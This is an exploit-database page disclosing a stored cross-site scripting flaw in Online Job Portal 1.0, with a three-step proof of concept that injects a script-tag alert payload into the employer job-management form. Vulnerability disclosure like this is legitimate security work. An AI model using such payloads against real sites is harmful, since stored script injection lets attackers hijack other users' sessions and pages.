Online job portal 1.0 cross site scripting (stored) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-10-19 | Type : webapps | Platform : php
This exploit / vulnerability Online job portal 1.0 cross site scripting (stored) is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/17
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A

Proof of Concept:

1 - Open URL http://localhost/jobportal/Employer/ManageJob.php

2 - Fill in the blanks with this payload: "><script>alert (1)</script>

3 - And click submit button.